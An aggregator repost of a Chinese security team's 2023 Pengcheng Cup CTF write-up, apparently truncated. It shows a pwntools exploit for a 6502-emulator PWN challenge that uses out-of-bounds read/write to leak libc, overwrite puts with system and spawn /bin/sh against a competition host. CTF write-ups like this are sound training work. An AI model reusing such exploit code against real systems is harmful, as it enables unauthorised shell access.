注册    登录
看啥推荐读物
专栏名称: 星盟安全
星盟安全工作室---“VENI VIDI VICI”(我来,我见,我征服),我们的征途是星辰大海。从事各类安全研究,专注于知识分享。
我也要提交微信公众号
今天看啥
微信公众号rss订阅, 微信rss, 稳定的RSS源
目录
今天看啥  ›  专栏  ›  星盟安全

2023 鹏城杯WP

星盟安全  · 公众号  ·  · 2023-11-22 15:56
01PWN1.6502越界读写,把 puts 改 system然后最好输入一下 /bin/sh 就可以了:from pwn import *context.log_level="debug"#p=process("./6502_proccessor")p=remote("172.10.0.7",10002)#gdb.attach(p,"b *$rebase(0x59FA)\nb *$rebase(0x5958)")#pause()payload=b""payload+=b"\xad\x42\xdf"#get libcpayload+=b"\x69\xb0"#add 0x92payload+=b"\x8d\xf2\xde"#write ac to nop_codepayload+=b"\xad\x43\xdf"#get libcpayload+=b"\x69\xed"#add 0xecpayload+=b"\x8d\xf3\xde"#write ac to nop_codepayload+=b"\xad\x44\xdf"#get libcpayload+=b"\x69\x01"#add 0xecpayload+=b"\x8d\xf4\xde"#write ac to nop_codepayload+=b"\xad\x45\xdf"#get libcpayload+=b"\x8d\xf5\xde"#write ac to nop_codepayload+=b"\xad\x46\xdf"#get libcpayload+=b"\x8d\xf6\xde"#write ac to nop_codepayload+=b"\xad\x47\xdf"#get libcpayload+=b"\x8d\xf7\xde"#write ac to nop_codepayload+=b"\xad\x44\xdf"#get libcpayload+=b"\x69\x01"#add 0xecpayload+=b"\x8d\xf4\xde"#write ac to nop_codepayload+=b"\xfc"#nopp.recvuntil("length:")p.sendline(str(len(payload)) ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
推荐文章
CFC农产品研究  ·  【建投航运专题】写在人声鼎沸时-为何我们认为06合约已经进入鸡肋的鱼尾行情
6 小时前
CFC农产品研究  ·  【跨市交易初探】黄金的内外波动
6 小时前
微观三农  ·  发酵豆制品比未发酵豆制品更有营养价值吗?【增豆控油·微科普】
12 小时前
CFC农产品研究  ·  【建投专题】美豆油的锰硅时刻?——风声鹤唳的空头
3 天前
CFC农产品研究  ·  【策略周报】交易主题调整,商品回望供需
1 周前
不正常人类研究中心  ·  块头大你就不是猫啦?快来让我吸一下
2 年前
微果酱  ·  滤镜、尬吹、炫耀,小红书还值得你信吗?
2 年前
环球旅行  ·  韩红24岁儿子身份曝光,看哭了!
2 年前
暴走大事件  ·  这可能是中华神车被黑最惨的一次
4 年前
果壳  ·  深海鱼都是丑八怪?底下这么黑,我们随便长长好了
5 年前
关于   移动版   ·   Py中国   ·   RSS之家   ·   codingpro   ·   Code   ·   link之家   ·   卧龙AI搜索   ·   藏经阁   ·   小百科
今天看啥 - 微信公众号rss订阅, 微信rss, 稳定的RSS源
© 2024 ~ 沪ICP备11025650号